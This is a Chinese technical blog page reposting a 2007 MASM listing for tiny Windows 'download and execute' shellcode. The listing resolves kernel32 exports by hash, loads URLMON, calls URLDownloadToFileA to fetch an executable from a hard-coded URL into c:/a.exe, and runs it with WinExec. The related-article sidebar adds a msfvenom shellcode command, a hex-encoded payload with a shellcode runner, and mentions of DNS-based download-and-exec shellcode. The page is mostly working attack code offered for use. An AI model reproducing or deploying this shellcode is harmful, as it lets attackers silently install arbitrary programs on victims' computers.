Tiny Download&&Exec ShellCode

最新推荐文章于 2024-03-14 11:28:51 发布
最新推荐文章于 2024-03-14 11:28:51 发布
阅读量1.2k 收藏 1
点赞数
文章标签: download header system dll date c

Author: czy
http://www.ph4nt0m.org
Date:2007-06-22


;Tiny Download && Exec ShellCode codz czy  2007.6 . 1
;header  163 = 61 ( 16 + 8 + 9 + ( 28 )) + 95 ( 68 + 27 ) + 17
; 163 + 19 = 192
comment  %
                # -------------------------------------- #          #
              #  Tiny Download && Exec ShellCode -->        #       #
            #     --> size  192                               #   #
          #                       2007.06 . 01                  # 
            #                    codz: czy                #   #
             # ------------------------------------------ #      #

system :test on ie6 + XPSP2 / 2003SP2 / 2kSP4
 %
. 586
.model flat,stdcall
option casemap:none

include     c:/masm32/include/windows.inc
include     c:/masm32/include/kernel32.inc
includelib  c:/masm32/lib/kernel32.lib
include     c:/masm32/include/user32.inc
includelib  c:/masm32/lib/user32.lib


.data
shelldatabuffer db  1024  dup( 0 )
shellcodebuffer db  2046  dup( 0 )
downshell db  ' down exploit ' , 0
txtname  db  ' c:/office/unicode.doc ' , 0
.code
start:
 invoke MessageBoxA, 0 ,offset downshell,offset downshell, 1
 invoke RtlMoveMemory,offset shellcodebuffer,00401040H, 256
 mov eax,offset shellcodebuffer
 jmp eax
 somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h
;上面的代码是把在代码段中的shellcode移动数据段中执行,模拟真实的shellcode执行环境 
@@shellcodebegin:  
 call @@beginaddr
@@beginaddr:
 PUSH 03H      ;要调用的API函数个数
 jmp @@realshellcode         
myExitProcess     dd 073e2d87eh  
myWinExec         dd 00e8afe98h   
myLoadLibraryA    dd 0ec0e4e8eh
dll               db  ' URLMON ' , 0 , 0
myUrlDownFile     dd 0702f1a36h
path              db  ' c:/a.exe ' , 0
url               db  ' http://www.masm32.net/a.exe ' , 0

 

@@realshellcode:
    POP ECX
    POP EDI
    SCASD ;edi + 4
;得到kernel32.dll基地址
db  67h,64h,0A1h,30h,00h
 mov eax, [eax + 0cH]
 mov esi, [eax + 1cH]
    lodsd
 mov ebp, [eax + 08H]          ;EBP中存放kernel32.dll的基地址
;处理导出表
@@next2:
PUSH      ECX
@@next3:
MOV       ESI,[EBP + 3Ch]
MOV       ESI,[EBP + ESI + 78h]
ADD       ESI,EBP
PUSH      ESI
MOV       ESI,[ESI + 20h]
ADD       ESI,EBP
XOR       ECX,ECX
DEC       ECX
@@next:
INC       ECX
LODSD
ADD       EAX,EBP
XOR       EBX,EBX
@@again:
    MOVSX     EDX,BYTE PTR [EAX]
    CMP       DL,DH
    JZ        @@end
    ROR       EBX,0Dh
    ADD       EBX,EDX
    INC       EAX
    JMP       @@again
@@end:
CMP       EBX,[EDI]
JNZ       @@next

POP       ESI
MOV       EBX,[ESI + 24h]
ADD       EBX,EBP
MOV       CX,WORD PTR [ECX * 2 + EBX]
MOV       EBX,[ESI + 1Ch]
ADD       EBX,EBP
MOV       EAX,[ECX * 4 + EBX]
ADD       EAX,EBP
STOSD
POP       ECX
loop @@next2

mov ecx,[edi]   ; 2
cmp cl, ' c '       ; 3
jz @@downfile   ; 2
PUSH EDI
CALL EAX        ; 2
xchg eax,ebp
scasd
scasd
push  01          ;2第二个DLL的函数个数
jmp @@next3     ; 2
                ;总计17

        
@@downfile:

 push edx  ; 0
 push edx  ; 0
 push    edi  ;file = c:/a.exe
 lea     ecx, dword ptr [edi + 9h]
 push    ecx  ;url
 push edx  ; 0
 call eax  ;URLDownloadToFileA, 0 ,url,file = c:/a.exe, 0 , 0
 
 
 push  1  ;FOR TEST
 push edi
 call dword ptr [edi - 14H] ;winexec, ' c:/xxx.exe ' , 1
 
    call dword ptr [edi - 18H] ;Exitprocess

    somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h
    invoke ExitProcess, 0
end start
 
iiprogram
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shellcodeexec, 在内存中,一系列操作码,要执行的脚本.zip
09-18
shellcodeexec, 在内存中,一系列操作码,要执行的脚本 背景在这里,大部分的shellcode启动程序包括了许多"安全"书籍的概念证明,详细介绍了如何在POSIX系统上分配内存页面,并在你的上进行复制,并。 这个工作正常。但是,它只限于 POSIX 。不必考虑 64位 架构和 Windows
python执行shellcode_python exec shellcode
weixin_39620653的博客
12-03 594
前言这里我先吐槽一下,网上用中文搜的python执行shellcode。全部是复制粘贴,棒的我不知道如何下手然后今天早上@即刻安全-Yansu老哥帮我整出来了。老板喝茶正文代码我理解不了多少,可能还有错的获取shellcodemsfvenom -p windows/x64/exec CMD=calc.exe -f py -o /root/demo.py执行shellcode代码如下import c...
shellcode初识
lonelydereng的专栏
06-16 706
这是对shellcode学习的一个初步实践,采用经典的w
ShellCode原理以及编写
qq_18811919的博客
07-02 2920
0x0 ShellCode编写注意事原理 1)不能使用字符串的直接偏移 即使你在C/C++代码中定义一个全局变量,一个取值为“Hello world”的字符串,或直接把该字符串作为参数传递给某个函数。但是,编译器会把字符串放置在一个特定的Section中(如.rdata或.data)。 2)不能确定函数的地址(如printf) 在shellcode中,我们却不能以逸待劳了。因为我们无法确定包含所需函数的DLL文件是否已经加载到内存。受ASLR(地址空间布局随机化)机制的影响,系统不会每次都把DLL文件加载
ShellcodeExec: 一个强大的Linux shellcode执行工具
最新发布
gitblog_00019的博客
03-14 392
ShellcodeExec: 一个强大的Linux shellcode执行工具 ShellcodeExec是一个功能强大的Python脚本,用于在Linux系统中执行shellcode。它不仅可以帮助你更轻松地运行shellcode,而且还提供了许多高级功能,如将shellcode注入到进程、生成PE文件等。 使用场景 ShellcodeExec可以用于各种安全研究和渗透测试任务。例如: 在目标...
Tiny210 Linux&Android内核驱动位置.pdf
01-07
### Tiny210 Linux & Android 内核驱动位置解析 #### 概述 本文档旨在对《Tiny210 Linux&Android内核驱动位置.pdf》的内容进行深入解析,特别是针对文档中提到的关键知识点进行详细说明。该文档主要介绍了Tiny210...
Tiny4412 Linux&Android内核驱动位置
02-17
根据给定文件的信息,我们可以总结出以下关于Tiny4412 Linux内核驱动的重要知识点: ### 一、Tiny4412 Linux内核驱动概述 Tiny4412是一款基于ARM架构的嵌入式开发板,它采用了强大的Cortex-A9处理器。此开发板主要...
tinyxml2 version 9.0.0下载地址
08-20
TinyXML2是一个小型、快速且易于使用的XML解析库,主要用于C++编程。版本9.0.0是该库的一个更新版本,提供了最新的功能和错误修复。在这个版本中,开发者可以期待更加稳定和优化的XML处理性能。 TinyXML2的设计目标...
Tiny Core Linux
02-03
旧电脑的首选系统:TinyCore!体积小+精简+速度极快,你敢安装吗? Tiny Core Linux是一款体积极小且高度可扩展的微型Linux发行版,它将一个 Linux 操作系统精简到16 MB的大小,要知道,我们常见的Ubuntu、CentOS、...
v-lazy-img-Tiny(<0.6kb)指令,用于Vue 2的渐进式图像加载。-Vue.js开发
05-27
Vue渐进图像延迟加载图像,同时显示预览。 极小,经过压缩和压缩后不到半千字节。 用法v-lazy-img在显示预览时添加Vue渐进图像延迟加载图像。 极小,经过压缩和压缩后不到半千字节。 用法v-lazy-img添加了指令v-lazy...
shellcode 执行盒
01-04
//msfvenom -p windows/exec CMD=calc.exe -f exe -e x86/shikata_ga_nai -i 6 -f c 生成shellcod 测试数据: bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62f39d5fcdac3b2be3b93176693fc70cdf3fd70e4f28e685002ff74f65cf155a9378800f1ee533fa5c10b00f1ce7a86519a36e9553bc1a99c0bd0efa872dd2d322d6712c 将shellcode作为参数传入执行盒,./shllcode_Argv.exe bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62f39d5fcdac3b2be3b93176693fc70cdf3fd70e4f28e685002ff74f65cf155a9378800f1ee533fa5c10b00f1ce7a86519a36e9553bc1a99c0bd0efa872dd2d322d6712c 即可执行该段shellcode。 该exe可传vt查看报毒情况,无特征码
windowsshellcode编写入门
热门推荐
x_nirvana的博客
03-31 1万+
本文简要介绍shellcode开发技术及其特点。理解这些概念可以有助于我们编写自己的shellcode。更进一步讲,你可以修改现有的漏洞利用代码来执行自己所需要的定制功能。
shellcode——1、采用硬编码弹出计算器
alwin_cx的博客
05-19 6480
一、shellcode介绍    用一句话给shellcode下个定义,那就是“一段可以执行特定功能的机器码”。二、实验环境及工具介绍实验环境:Windows XP SP3实验工具:OllyDbg、WinHex、LordPE三、编程思路     用C语言来描述其实就是两句:WinExec("calc.exe", 5); ExitProcess(0);     看到有些文章会在开头还加一句:Load...
执行shellcode的几种方式
qq_41683305的博客
02-24 4885
首先写出汇编成功弹出计算器 #pragma comment(linker,"/section:.data,RWE") //data段可读写 #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") //不显示窗口 #pragma comment(linker,"/INCREMENTAL:NO") //指...
DNS Reverse Download and Exec Shellcode
www.i201314.net
07-01 570
## # Shellcode: download and execute file via reverse DNS channel # # # Features: # * Windows 7 tested # * UAC without work (svchost.exe makes requests via getaddrinfo) # * Firewall/Router/Nat/Proxy b
linux exec /bin/sh shellcode x86 and x86_64
p0x1307的专栏
07-17 1894
linux/x86/x64 shellcodeexec /bin/sh
C语言实现shellcode通用框架二:文件下载执行或内存加载
yan_star的博客
01-21 1191
简介: 承接接上篇。上篇(C语言实现shellcode通用框架一:解密执行)我们的第二层shellcode核心代码都是事先加密好嵌套在第一层shellcode中,核心代码更新起来不方便。所以联网更新显得尤为重要。大家可以选择内存加载,这样可以避免落地被杀软查杀,也可以选择落地,随意选择,思想和代码很重要。其实,这篇介绍的shellcode框架代码和上篇大同小异,无非是API、动态库多了一些,代码量有所变大,但是核心思想,代码逻辑还是一样的。开下源,希望对大家学习有所帮助。关于内存加载那块我注释并标出了,使
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值